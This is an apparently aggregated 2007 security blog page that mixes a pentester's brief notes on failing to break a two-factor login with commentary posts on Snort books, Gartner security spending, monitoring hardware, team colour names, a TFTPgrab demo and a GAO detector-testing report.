Exactly. C&A has absolutely zero operational security value, as I wrote in FISMA 2006 Scores.

I commend the Congressional committee tracking this problem and I welcome future reporting. I would love to be the expert witness in any trial between the government and Unisys, but that is outside the scope of my current employment!

2 Factor Authentication Update

I don't believe this, i can't basically do a SQL injection, CSRF or XSS! Everything i wanted to do is basically either encrypted or if i injection a simple character like ", it says service unavailable. This application can be considered very secure it terms of encryption and of good standard if weighing it against the OWASP top ten. Even if i enter a value like 10, this value will be encrypted with this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running outta ideas, tell me what more can i do??

The Hacka Man

Senin, 24 September 2007

2 Factor Authentication Day 2

Damn, its getting tough! Have you guys seen a 6 digit password with an encrypted
string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, there is nothing more i can do? I dunno, still thinking:?????

The Hacka Man

2 Factor Authentication?

Well, if you guys asked me if why i havent been updating my blog? I can only say that there is so much to be done in work and of course reading a lot on Rsnake's XSS exploit and defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well back to the main topic, i had been assigned to hack an application with 2 factor authentication. Damn, all i can say is it is very secure it terms of randomness in session id, hidden fields and encryption. There is no way i can break the application's login page and the only thing i found is only a jar file with lotsa class files inside. Well, i know i can use a java decompiler like jad to get the source code but i did not because i am concentrating more on finding vulnerabilities. Hmz....I will continue with part 2 tomorrow. Firefox is a very cool tool to do web hacking. Install the following extentions guys

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Sabtu, 22 September 2007

Review of Snort IDS and IPS Toolkit and One Prereview

Amazon.com just posted my three star review of Snort IDS and IPS Toolkit. From the review:

Syngress published "Snort 2.0" in Mar 03, and I gave it a four star review in Jul 03. Syngress followed with "Snort 2.1" in May 04, and I gave it a four star review in Jul 04. I recommend reading those reviews, since the latest edition -- "Snort IDS and IPS Toolkit" (SIAIT) -- makes many of the same mistakes as its predecessors. Worse, it includes material that was already outdated in BOTH previous editions. If you absolutely must buy a book on Snort, this edition is your only real choice. Otherwise, I would stick with the manual and online articles.

SIAIT looks impressive page-wise, but it suffers from the multiple-author, no-editing, rush-to-production problems unfortunately inherent in many Syngress titles. One would think that including many contributing authors (11, apparently) would make for a strong book. In reality, the book contributes very little beyond what appears in "Snort 2.1," despite the fact that "only" chapters 8, 10, 11, and 13 appear to be repeats or largely rehashes of older material. Comparing to "Snort 2.1," these compare to old chapters 7, 10, 12, and 11, respectively.

The absolute worst part of this book is the re-introduction of all the outdated information in chapters 8 and 10. It is 2007 and we are STILL reading on p 353 that XML output is "our favorite and relatively new logging format" and on p 367 that "Unified logs are the future of Snort reporting." (I cited both of these as being old news in Jul 04!) I should note that these chapters are not entirely duplicates; if you compare output such as that on page 335 of "Snort 2.1" with page 365 in SIAIT you'll see the author replaced the original 2003 timestamps with 2006! This is the height of lazy publishing. Chapter 10 features similar tricks, where traffic is the same except for global replacements of IP addresses and timestamps; notice the ACK numbers are still the same and the test uses Snort 1.8.


You can read my reviews of Snort 2.1 and Snort 2.0 for reference. If I see Syngress publish another Snort book based on this line of material, I won't bother next time.

On a more positive note, thank you to O'Reilly for sending me a review copy of Security Power Tools. This book looks like it deserves a grunt from Tim the Toolman Taylor. The book appears to have lots of useful information, although why in Pete's name is there a chapter (11) on BO2k? Let it die, already. It's 2007.

Jumat, 21 September 2007

Pescatore on Security Trends

The article Spend less on IT security, says Gartner caught my attention. Comments are inline, and my apologies if Mr. Pescatore was misquoted.

Organisations should aim to spend less of their IT budgets on security, Gartner vice-president John Pescatore told the analyst firm’s London IT Security Summit on 17 September.

In a keynote speech, he said that retailers typically spend 1.5% of revenue trying to prevent crime, then still lose a further 1.5% through shoplifting and staff theft, costing 3% in total.


Digital security is not comparable to shoplifting. It is not feasible for shoplifters to steal every asset from an a company in a matter of seconds, or subtly alter all of the assets so as to render them untrustworthy or even dangerous. I would also hardly consider shoplifters an "intelligent adversary."

But Gartner’s research suggests that the average organisation spends 5% of its IT budget on security, even with disaster recovery and business continuity work excluded, and IT managers are tired of requests for more. Security has dropped from first (in 2005) to sixth (in 2007) in the firm’s annual survey of chief information officers’ technical concerns.

I concur with this, especially with regard to IPS and SIM/SEM/SIEM. Managers spent a lot of money several years ago on this technology and they are "still getting hacked."

Pescatore said that managers are not impressed by the claim that “security is a journey” without a destination. “Can you imagine, ‘profit is a journey’?” he asked, pointing out that other areas of IT are often able to offer their organisations more functionality for less money, or some other kind of business benefit.

This could be the single greatest problem I see in this whole article. Please tell me how profit is not a journey, unless the goal of your company is to 1) enjoy a really awesome quarter (or year, etc.) and then disappear; or 2) dash for the acquisition line and then cash out. The operative word in business is not profit but profitability. A stock price reflects future value. Turning strictly to the security aspect, I'd like to hear Mr. Pescatore or his upset managers describe when security can end. This statement is clearly troubling.

Growing efficiencies could be possible for IT security too: “I really don’t think most of us need more and people,” he said, if organisations moved to a model he called ‘Security 3.0’. In this, IT security would anticipate threats, rather than fight them after they hit.

This is another poor statement. As I wrote in Attacker 3.0, security is at 1.0 (and that's being generous) while we approach Web 2.0 and fight Attacker 3.0. No one is ahead of the threat and no one could ever be. Advanced attackers are digital innovators. By definition they cannot be anticipated.

Pescatore said ways to prevent problems rather than fight them include buying and building secure systems, which means considering security during procurement and development, and rejecting products which are not adequately protected. This might mean spending more initially, but prevention is cheaper than cure.

This is all true and sounds nice, but it has never worked and will never work. Everyone is so excited to see the government finally working with Microsoft to secure the operating system, but at this point who really cares? It's all about applications now.

In response to a question, Pescatore dismissed the idea that insider threats are growing: he believes that attacks generated by malicious insiders are stable at 20-25%. Half come from mistakes made by insiders, while around 30% of attacks are made solely by outsiders, the majority of whom are cybercriminals.

I love to see the insider threat fans squashed.

Let's hear another view on this speech from Security to drop out of CIO spending top ten:

Security pros need to get more proactive about dealing with threats and adopt strategies to persuade their colleagues to take on security spending as part of their projects, according to analysts Gartner.

The changes in roles for security specialists come as the internet security market enters what Gartner described as the third major stage of its development.

Always a sector of the industry that relishes one-upmanship, the Web 2.0 phenomenon is accompanied by Security 3.0. The first stage of security, according to Gartner, belongs to the time of centralised planning and the mainframe. The widespread use of personal computers ushered in reactive security to deal with threats such as malicious computer hackers and worms (security 2.0). Security 3.0 is characterised by an era of more proactive security, according to John Pescatore, a VP and distinguished analyst at Gartner.

Security 3.0 involves an approach to risk management that applies security resources appropriately to meet business objectives. Instead of bolting security on as an afterthought, Security 3.0 integrates compliance, risk assessment and business continuity into every process and application.

For security managers the process involves persuading their counterparts in, for example, application development to include security functions in their projects. In this way security expenditure in real terms can go up even as security budgets (as such) stay flat or modestly increase. Security budgets freed from firefighting problems can then be invested with a view to managing future risks.

"Even a reduced security budget does not necessarily mean reducing security-related spending," Pescatore said. "Security professionals need to think in terms of changing who pays for security controls," so they can "move upstream" and spend their time and resources on more demanding projects, he added.


Now this makes sense to me. I do not understand why security as it relates to applications should be treated separately from those applications. Security should be another consideration that is built into the application, along with performance and other features. Security as an operational discipline doesn't need to be integrated into other businesses, but including security natively in projects is the right way forward.

Gartner predicts that security spending will rise 9.3 per cent in 2007, but will drop out the first ten spending priorities for CIOs for the first time since the prolific internet worms of 2003. Malware threats these days have evolved into targeted attacks featuring malware payloads designed not to draw attention to themselves.

This "run silent, run deep" malware means that security is a less high-profile function than before, as improving business processes and reducing costs become the pre-eminent priorities for IT directors.


This is true and it is killing us. Security got plenty of attention when managers could see the sky was falling. In other words, when their email and their boss' email was inaccessible or filled with spam and malware, or they couldn't surf the Web because their pipe was filled by DoS traffic, security failures couldn't be ignored. Now enterprises are silently and completely owned, and no one cares.

Finally, a few more thoughts from Managing IT risk in unchartered waters of "Security 3.0":

Gartner research suggests that throwing money a security is not working. At the summit, the firm said that there is no correlation between security spending and the security level of a system. The firm added that progress in security should see a reduction in security spending, not increase it.

I agree with this. The reasons are complex, but a major problem is that managers have no idea if the money they apply makes any difference in their security posture. To the degree they measure at all, they measure inputs of questionable value and ignore the output. However, I don't see how Gartner can say that success in security means spending falls. This is not the so-called "war on drugs" where a raise in the price of a drug means interdiction could be restricting supply. Security spending is determined by management; it is not an output of the security process.

Overall, it must have been an interesting speech! I fear the overall take-away for managers will be the "spend less on security" and "employ fewer people" headlines. That may be appropriate if you know how spending and manpower affects security outputs, but that is not the case. I believe management is spending plenty of money on the wrong tools and potentially people, and directing resources to other functions would be more effective.

Tactical Network Security Monitoring Platform

I am working both strategic and tactical network security monitoring projects. On the tactical side I have been looking for a platform that I could carry on a plane and fit in the overhead compartment, or at the very least under the seat in front of me. Earlier in my career I've used Shuttle and Hacom boxes, but I'm always looking for something better.

People often ask "Why don't you use a laptop?" Reasons to not use a laptop include:

  • Laptops don't have PCI, PCI-X or PCI Express slots to accommodate extra NICs, especially for fiber connections.

  • Laptops are not designed to run constantly.

  • Laptop storage is not as robust as server storage, since laptops usually accommodate up to two internal hard drives, with some capacity for external storage.

  • Laptops are consumer devices and not generally built for server-type operations.


Today I think I found the device I needed: NextComputing NextDimension Pro, pictured above. The specs are as follows:

  • Single dual-core 2.2 GHz AMD Opteron 275/940

  • 4 GB RAM (2 GB x 2, PC3200/400 MHz DDRAM)

  • Two Marvell Yukon 88E8052 Gigabit Ethernet

  • One NVIDIA nForce4 CK804 MCP9 Networking Adapter (Marvell 88E1111 Gigabit PHY)

  • Two 160 GB 7200 RPM SATA 2.5" Seagate Momentus HDDs connected to on-board four port SATA controller

  • Four 160 GB 7200 RPM SATA 2.5" Seagate Momentus HDDs connected to PCI-X four port SATA RAID controller

  • Four USB 2.0

  • Two external SATA ports

  • One RS232 serial port and one RS232 serial port with RS422/485 adaptor

  • DVD drive

  • Two PCI-X slots OR two PCI Express slots OR one PCI-X and one PCI Express; mine has one 16x PCI Express slot and one PCI-X full length slot.

  • Graphics out via Nvidia


I tried FreeBSD 7.0-CURRENT-200709-amd64-disc1.iso on this machine and it installed flawlessly. If you want to see dmesg output please visit Dmesgd courtesy of NYCBUG.

Check out the storage available. If I need to I could combine /nsm1 and /nsm2 into /nsm using Gconcat.

$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/ad4s1a 989M 194M 716M 21% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/ad4s1e 9.7G 24K 8.9G 0% /home
/dev/ad4s1f 77G 4.0K 71G 0% /nsm1
/dev/da0s1d 577G 4.0K 531G 0% /nsm2
/dev/ad4s1g 9.7G 12K 8.9G 0% /tmp
/dev/ad4s1d 39G 1.2G 34G 3% /usr
/dev/ad6s1d 144G 258K 133G 0% /var

I am really pleased FreeBSD 7.0 installs on this machine. I may try the i386 version at some point, but I hope to stick with the AMD64 version if possible.

Security Jersey Colors

I realized after my previous post that not everyone may be familiar with the "color" system used to designate various military security teams. I referenced a "red team" in my post NSA IAM and IEM Summary, for example.

I thought it might be helpful to post my understanding of these colors and to solicit feedback from anyone who could clarify these statements.


  • Red Team: A Red Team is an adversary simulation team. The Red Team attacks the asset to meet an objective. This activity is called penetration testing in the commercial world.

  • Blue Team: A Blue Team is a security posture assessment and evaluation team. The Blue Team determines the vulnerabilities and exposures of an enterprise. This activity is called vulnerability assessment in the commercial world.

  • White Team: A White Team (or usually a "White Cell") controls the environment during an exercise. The White Cell provides the framework in which the Red Team attacks friendly forces. (Note that in some situations the friendly forces are called the "Blue Team." This is not the same Blue Team that conducts vulnerability assessments and evaluations. Blue in this case is simply used to differentiate from Red.)

  • Green Team: The Green Team is usually a training group that helps the asset owners. Alternatively, the Green Team helps with long-term vulnerability and exposure remediation, as identified by the Blue Team. These descriptions are open for discussion because I haven't seen too many green team activities.


Did I miss any colors?

Tactical Traffic Assessment

When I wrote Extrusion Detection in 2004-5 I used the term Traffic Threat Assessment to describe a means of inspecting network traffic for signs of malicious activity. I differentiated among various assessments using this terminology.

  1. A vulnerability assessment identifies vulnerabilities and exposures in assets.

  2. A penetration test identifies at least one way that an adversary could exploit vulnerabilities and exposures to compromise a target or satisfy a related objective.

  3. A traffic threat assessment identifies traffic that indicates a network has already been compromised.


The goal of the customer determined which of the actions to perform.

I was not really comfortable with the term "traffic threat assessment," so I'm going to use Tactical Traffic Assessment starting now. That definition for TTA nicely differentiates between a short-term, focused, tactical effort and a long-term, enterprise-wide, strategic program like Network Security Monitoring.

Tactical Traffic Assessment removes the "threat assessment" part out of TTA, since "threat assessment" is more about characterizing the capabilities and intentions of an adversary and not whether he has compromised the enterprise.

Tactical Traffic Assessment also leaves room for findingnon-security issues like misconfigured devices or other troubleshooting-related network problems.

Wisdom from Ranum

The Face-Off article in the September 2007 Information Security Magazine contains a great closing thought by Marcus Ranum:

Will the future be more secure? It'll be just as insecure as it possibly can, while still continuing to function. Just like it is today.

"Continuing to function" is an interesting concept. The reason the "Internet" hasn't been destroyed by terrorists, organized crime, or others is that doing so would cut off a major communication and funding resource. Criminals and other adversaries have a distinct interest in keeping computing infrastructure working just well enough to exploit it.

Being "secure" is another wonderful idea. Marcus clearly shows that there is no secure -- i.e., there is no end game. None of us can retire "when our work is done." We will retire when we can hand off the problem to another generation.

Kamis, 20 September 2007

TFTPgrab

While I was teaching and speaking at conferences, I usually discussed research and coding projects with audience members. One of my requests involved writing a tool to reconstruct TFTP sessions. Because TFTP uses UDP, files transferred using TFTP cannot be rebuilt using Wireshark, TCPFlow, and similar tools. I was unaware of any tool that could rebuild TFTP transfers, despite the obvious benefit of being able to do so.

Today I was very surprised to receive an email from Gregory Fleischer, who directed me to his new tool TFTPgrab. He saw my ShmooCon talk earlier this year, heard my plea, and built a TFTP file transfer reconstruction tool! I downloaded and compiled it on FreeBSD 6.2 without incident, and here is I how I tested it.

I ensured a TFTP server was running on a FreeBSD system. I identified a small .gif to upload and download using TFTP.

richard@neely:~$ md5sum rss.gif
01206e1a6dcfcb7bfb55f3d21700efd3 rss.gif
richard@neely:~$ tftp
tftp> binary
tftp> trace
Packet tracing on.
tftp> verbose
Verbose mode on.
tftp> connect hacom
tftp> put rss.gif
putting rss.gif to hacom.taosecurity.com:rss.gif [octet]
sent WRQ <file=rss.gif, mode=octet>
received ACK <block=0>
sent DATA <block=1, 451 bytes>
received ACK <block=1>
Sent 451 bytes in 0.0 seconds [inf bits/sec]

After the file was uploaded to the TFTP server I changed to /tmp, then downloaded the copy on the TFTP server.

richard@neely:~$ cd /tmp
richard@neely:/tmp$ tftp
tftp> verbose
Verbose mode on.
tftp> binary
mode set to octet
tftp> connect hacom
tftp> get rss.gif
getting from hacom.taosecurity.com:rss.gif to rss.gif [octet]
Received 451 bytes in 0.0 seconds [inf bits/sec]
tftp> quit
richard@neely:/tmp$ md5sum rss.gif
01206e1a6dcfcb7bfb55f3d21700efd3 rss.gif

Notice the file I uploaded is exactly the same as the downloaded version, per the MD5 hashes.

The traffic looked like this.



I will have to be honest here and say that I expected to see everything happening over port 69 UDP. I didn't expect to see the server choose another port, but it's completely within spec and normal according to RFC 1350. Before commenting with a lecture on how TFTP works, please be aware that I read the relevant section of the RFC and understand transaction IDs and how ports are chosen.

I copied the trace to a system with TFTPgrab and let it process the trace.

hacom:/root/tftpgrab-0.2# ./tftpgrab -h
Usage: ./tftpgrab [OPTION]... [-r FILE] [EXPRESSION]
Reconstruct TFTP file contents from PCAP capture file.
With no FILE, or when FILE is -, read standard input.
-r PCAP file to read
-f overwrite existing files
-c print TFTP file contents to console
-E exclude TFTP filename when reconstructing
-v print verbose TFTP exchanges (repeat up to three times)
-X dump TFTP packet contents
-B check packets for bad checksums
-d specify debugging level
hacom:/root/tftpgrab-0.2# ./tftpgrab -r /tmp/tftpgrab.lpc
reading from file /tmp/tftpgrab.lpc, using datalink type EN10MB (Ethernet)
hacom:/root/tftpgrab-0.2# file 192*
192.168.002.101.32979-010.001.013.004.49324-rss.gif:
GIF image data, version 89a, 36 x 14
192.168.002.101.32980-010.001.013.004.53366-rss.gif:
GIF image data, version 89a, 36 x 14
hacom:/root/tftpgrab-0.2# md5 192*
MD5 (192.168.002.101.32979-010.001.013.004.49324-rss.gif) =
01206e1a6dcfcb7bfb55f3d21700efd3
MD5 (192.168.002.101.32980-010.001.013.004.53366-rss.gif) =
01206e1a6dcfcb7bfb55f3d21700efd3

As you can see, TFTPgrab pulled two files out of the trace and saved them to disk. They are identical to each other and to the original.

Thanks again to Gregory Fleischer for writing TFTPgrab!

Radiation Detection Mirrors Intrusion Detection

Yesterday I heard part of the NPR story Auditors, DHS Disagree on Radiation Detectors. I found two Internet sources, namely DHS fudged test results, watchdog agency says and DHS 'Dry Run' Support Cited, and I looked at COMBATING NUCLEAR
SMUGGLING: Additional Actions Needed to Ensure Adequate Testing of Next Generation Radiation Detection Equipment
(.pdf), a GAO report.

The report begins by explaining why it was written:

The Department of Homeland Security’s (DHS) Domestic Nuclear Detection Office (DNDO) is responsible for addressing the threat of nuclear smuggling. Radiation detection portal monitors are key elements in our national defenses against such threats. DHS has sponsored testing to develop new monitors, known as advanced spectroscopic portal (ASP) monitors.

In March 2006, GAO recommended that DNDO conduct a cost-benefit analysis to determine whether the new portal monitors were worth the additional cost. In June 2006, DNDO issued its analysis. In October 2006, GAO concluded that DNDO did not provide a sound analytical basis for its decision to purchase and deploy ASP technology and recommended further testing of ASPs. DNDO conducted this ASP testing at the Nevada Test Site (NTS) between February and March 2007.

GAO's statement addresses the test methods DNDO used to demonstrate the performance capabilities of the ASPs and whether the NTS test results should be relied upon to make a full-scale production decision.

GAO recommends that, among other things, the Secretary of Homeland Security delay a full-scale production decision of ASPs until all relevant studies and tests have been completed, and determine in cooperation with U.S. Customs and Border Protection(CBP), the Department of Energy (DOE), and independent reviewers, whether additional testing is needed.
(emphasis added)

Notice that a risk analysis was not done. Rather, a cost-benefit analysis was done. This is consistent with the approach I liked in the book Managing Cybersecurity Resources, although in that book the practicalities of assigning certain values made the exercise fruitless. Here the cost-benefit approach has a better chance of working.

Next the report summarizes the findings:

Based on our analysis of DNDO’s test plan, the test results, and discussions with experts from four national laboratories, we are concerned that DNDO’s tests were not an objective and rigorous assessment of the ASPs’ capabilities. Our concerns with the DNDO’s test methods include the following:

  • DNDO used biased test methods that enhanced the performance of the ASPs. Specifically, DNDO conducted numerous preliminary runs of almost all of the materials, and combinations of materials, that were used in the formal tests and then allowed ASP contractors to collect test data and adjust their systems to identify these materials.

    It is highly unlikely that such favorable circumstances would present themselves under real world conditions.

  • DNDO’s NTS tests were not designed to test the limitations of the ASPs’ detection capabilities -- a critical oversight in DNDO’s original test plan. DNDO did not use a sufficient amount of the type of materials that would mask or hide dangerous sources and that ASPs would likely encounter at ports of entry.

    DOE and national laboratory officials raised these concerns to DNDO in November 2006. However, DNDO officials rejected their suggestion of including additional and more challenging masking materials because, according to DNDO, there would not be sufficient time to obtain them based on the deadline imposed by obtaining Secretarial Certification by June 26. 2007.

    By not collaborating with DOE until late in the test planning process, DNDO missed an important opportunity to procure a broader, more representative set of well-vetted and characterized masking materials.

  • DNDO did not objectively test the performance of handheld detectors because they did not use a critical CBP standard operating procedure that is fundamental to this equipment’s performance in the field.

(emphasis added)
Let's summarize.

  • DNDO helped the vendor tune the detector.

  • DNDO did not test how the detectors could fail.

  • DNDO did not test the detectors' resistance to evasion.

  • DNDO failed to follow an important standard operating procedure.


I found all of this interesting and relevant to discussions of detecting security events.

Senin, 17 September 2007

The Academic Trap

I really enjoyed Anton's post Once More on Failure of Academic Research in Security where he cites Ian Greg's The Failure of the Academic Contribution to Security Science:

[A]cademics have presented stuff that is sometimes interesting but rarely valuable. They've pretty much ignored all the work that was done before hand, and they've consequently missed the big picture.

Why is this? One reason is above: academic work is only serious if it quotes other academic work. The papers above are reputable because they quote, only and fulsomely, other reputable work. And the work is only rewarded to the extent that it is quoted ... again by academic work.

The academics are caught in a trap: work outside academia and be rejected or perhaps worse, ignored. Or, work with academic references, and work with an irrelevant rewarding base. And be ignored, at least by those who are monetarily connected to the field.

By way of thought experiment, consider how many peer-review committees on security conferences include the experts in the field?


This is very interesting, but I'm not sure I agree. I think another reason might be the lack of ex-practitioners (with military and/or commercial hands-on experience) in the teaching ranks. Whatever the case, it should not be restricted to our field. There must be dozens of other professions with disconnects between academia and industry?

Incidentally, I was just invited to be on the peer-review committee for VizSec 2008, in conjunction with RAID 2008, in Boston next September. I am really excited to be attending both conferences. Maybe inviting me to be on the board is an indication of academia reaching out to industry?

A focus on practicality is one of the reasons I am drawn to the University of Cambridge Computer Laboratory, where the focus is on actionable security research, not theory.

Anton Chuvakin's Age of Compliance Reports

I didn't pay close enough attention when Anton Chuvakin first mentioned this series of articles he's writing. His "Age of Compliance" series addresses various operational security issues and then describes how certain legal frameworks (Federal Information Security Management Act, Payment Card Industry Data Security Standard, Health Insurance Portability and Accountability Act, etc.) influence those activities.

Thus far Anton has published:

These are great if you are trying to cite regulations for justifying security funding.